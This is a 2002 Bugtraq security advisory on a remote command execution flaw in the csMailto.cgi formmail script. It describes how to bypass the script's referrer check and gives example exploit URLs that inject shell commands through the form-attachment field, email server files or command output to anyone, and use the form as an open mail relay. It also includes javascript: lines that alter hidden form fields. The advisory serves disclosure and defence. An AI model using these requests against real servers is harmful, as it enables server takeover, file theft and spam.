From: Steve Gustin <stegus1@yahoo.com> To: bugtraq@securityfocus.com Subject: CGIscript.net - csMailto.cgi - Remote Command Execution Date: Tue, 23 Apr 2002 13:02:17 -0700 (PDT) CGIscript.net - csMailto.cgi - Remote Command Execution --------------------------------------------------------------------- Name : CGIscript.net - csMailto.cgi - Remote Command Execution Date : April 23, 2002 Product : csMailto Vuln Type : Access Validation Error Severity : HIGH RISK Vendor : WWW.CGIscript.NET, LLC. Homepage : http://www.cgiscript.net/ DISCUSSION: --------------------------------------------------------------------- csMailto is a perl cgi formmail script developed by Mike Barone and Andy Angrick of CGIscript.net. From the website "(csMailto is) an automated script that allows the user to build and manage multiple mailto forms to use within your web site. Build your own mailto forms without having to learn Perl. It also can send and receive files!". The script stores all its configuration data in hidden form fields, relying on the user to accurately (and honestly) echo that information back with each form submission. The only thing allowing a user from having complete control over the script is a referer check which is easily bypassed. Because of this and other problems, the script is subject to the following attacks: - execute commands on server - execute command on server and mail output to anyone - email server files to anyone - downloading of logged form input (in CSV format) - use of form to send email to anyone EXPLOIT: --------------------------------------------------------------------- Because the script stored all the form configuration data in hidden fields in the actual form, once a user can bypass the referrer check they can essentially do anything an administrator of the program could do, plus some additional things that probably weren't intended. The script doesn't even check for the full referrer, it only checks for the presence of the server hostname in the referral your send. For example, if the script is http://host.com/cgi-script/CSMailto/CSMailto.cgi then it will look for "host.com" in the referer. This method is inherently insecure and can be bypassed by: - Creating a perl LWP script which could specify an arbitrary referrer. - Using javascript or other means to modify the form values on the generated CSMailto form and allowing the browser to send the original (and valid) URL as a referrer. - Creating a local form page with the target hostname in the path and thus the referrer that is sent when in the form is submitted (eg: C:\html\host.com\form.html) - Creating a local html page with a simple link (see below) and the target hostname in the path and thus in the referrer that is sent when the link is clicked (eg: C:\html\host.com.html) Some example exploits are as follows. Note, these all assume that the referrer check was bypassed with one of the above methods. - execute commands on server CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform - execute command on server and mail output to anyone CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform - email server file to anyone CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform - download/access form input (no referer check) CSMailto has the option to "have the feedback exported to an external file". These files are stored in CSV format and can be downloaded from: CSMailto/export/FORM_NAME.csv Form HTML files are often named after their form names and the information is also stored in hidden fields in the actual form like so "...formname=FORM_NAME...". Also, it's worth noting that the script doesn't properly escape '"', ',', or nextline ("\n") chars, so any CSV data with those characters may get corrupted. - use form to send email to anyone CSMailto.cgi?form-to=to@host.com&form-from=from@host.com&form-subject=subject&form-results=body&command=mailform Another example of the seriousness of this problem, as mentioned above, you can simply load an existing CSMailto form and have your browser (IE in this example) change some of the preset hidden form values and then click submit. Example: - email server file to anyone javascript:alert(document.forms[0]["form-attachment"].value="FILEPATH"); javascript:alert(document.forms[0]["form-autoresponse"].value="YES"); javascript:alert(document.forms[0]["Email"].value="user@host.com"); IMPACT: --------------------------------------------------------------------- Because of the high number of users who are using CGIscript.net scripts (over 17,000 csSearch users alone according to the website) and the fact that search engines can easily be used to identify sites with the unique "csMailto.cgi" script name, the risk posed by these flaws is very high indeed. SOLUTION --------------------------------------------------------------------- Vendor was notified on Apr 5, 2002 of the problem but has not yet released a fix. Affected parties may want to consider switching to a free replacement such as "nms formmail" which can be found at http://nms-cgi.sourceforge.net/scripts.shtml VENDOR HISTORY: --------------------------------------------------------------------- April 8, 2002 - csGuestbook.cgi, csLiveSupport.cgi, csNewsPro.cgi, csChatRBox.cgi - Remote Code Execution http://online.securityfocus.com/archive/1/266432 March 25, 2002 - csSearch.cgi - Remote Code Execution http://online.securityfocus.com/archive/1/264169 DISCLAIMER --------------------------------------------------------------------- The information within this document may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information. Any use of this information lays within the user's responsibility. FEEDBACK: --------------------------------------------------------------------- If anyone has any other CGIscript.net scripts they'd like me to take a look at, just drop me a line at stegus1@yahoo.com. __________________________________________________ Do You Yahoo!? Yahoo! Games - play chess, backgammon, pool and more http://games.yahoo.com/